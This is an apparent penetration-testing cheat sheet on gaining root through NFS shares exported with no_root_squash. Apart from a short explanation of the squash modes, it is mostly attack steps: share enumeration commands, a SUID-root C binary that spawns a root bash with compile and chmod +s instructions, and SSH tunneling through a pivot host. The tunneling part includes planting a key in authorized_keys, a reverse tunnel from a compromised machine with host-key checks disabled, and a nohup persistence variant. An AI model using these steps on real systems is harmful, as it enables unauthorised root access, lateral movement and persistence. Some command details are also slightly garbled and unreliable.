📁 NFS (Network File System)

NFS allows sharing directories over a network. In some misconfigured cases (especially with no_root_squash), an attacker can gain root privileges remotely.

📚 Resources

General Tricks

• Hacktricks NFS Exploit

Exploit

• Exploit NFS
• SSH Tunneling - NFS Exploit
• Remote Exploit Using SSH - NFS Exploit

Tools

• NfSpy - Remote Exploit

🔎 Enumeration

Basic commands to discover and list available NFS shares on a target:

# List exported shares on the target
showmount -e <target-ip>

# Check if the port is open (2049/tcp)
nmap -p 2049 --script=nfs* <target-ip>

# Mount the export manually
sudo mount -t nfs <target-ip>:/shared/folder /mnt/nfs

# Use NFSv3 and disable file locking
sudo mount -t nfs -o nolock,nfsvers=3 $IP:/shared/folder /mnt/nfs

🔍 Squashing

The squash mechanism controls how NFS handles user permissions. This is where the main vulnerability lies.

• all_squash: Maps all UID/GID to nobody (UID 65534). No real users are recognized.
• root_squash (default): Only the root user (UID 0) is mapped to nobody. All other UID/GIDs are respected.
• no_root_squash: No mapping is performed, not even for root. This mode is dangerous as it allows a remote root user to keep their privileges.

⚙️ Config File

NFS exports are defined in /etc/exports.

/opt/shared/ 127.0.0.1(insecure,rw,sync,no_subtree_check,no_root_squash)

This configuration is vulnerable because it uses no_root_squash.

💥 Exploit

When an NFS export is mounted with no_root_squash, an attacker can:

1. Mount the NFS share as root on their machine:

# mount nfs share
sudo mount -t nfs $IP:/opt/shared /mnt/shared

2. Create a SUID root binary inside this folder:

// exploit.c

#include <stdlib.h>
#include <unistd.h>

int main() {
  setreuid(0, 0);
  system("/bin/bash");
  return 0;
}

gcc exploit.c -o exploit -static

mv exploit /mnt/exploit_nfs/
chmod +x /mnt/exploit_nfs/exploit
chmod +s /mnt/exploit_nfs/exploit

3. Run the binary on the vulnerable machine as any user:

./exploit

Result:

> id
uid=0(root) gid=0(root) groups=0(root)

🌐 Network Access and SSH Tunneling

If the NFS port (2049) is not directly accessible from your machine, but you have access to an intermediate host on the network, you can use SSH tunneling to forward the port and mount the NFS share locally.

Example: SSH Local Port Forwarding

ssh -L 2049:127.0.0.1:2049 user@pivot-host
sudo mount -t nfs 127.0.0.1:/opt/shared /mnt/shared

Remote Reverse Shell + Tunnel Setup

if the revshell is used to perform this exploit, the ssh BatchMode can be disabled, you must use an ssh-key :

# On the pivot server:

ssh-keygen -t ed25519 -f ~/.ssh/pwn_key
cat ~/.ssh/pwn_key.pub >> ~/.ssh/authorized_keys

# Create SSH tunnel from the compromised machine back to the pivot host

ssh -n -i /tmp/tmp.0oKnrS9g1v/ \
    -o UserKnownHostsFile=/dev/null \
    -o BatchMode=yes \
    -o StrictHostKeyChecking=no \
    -N -R 2049:127.0.0.1:2049 user@pivot-host

# Alternatively, you can use nohup for persistence:
# nohup ssh -Nf -R 1234:127.0.0.1:2049 -p 4444 user@ip &

# On the pivot host:

sudo mount -t nfs 127.0.0.1:/opt/shared /mnt/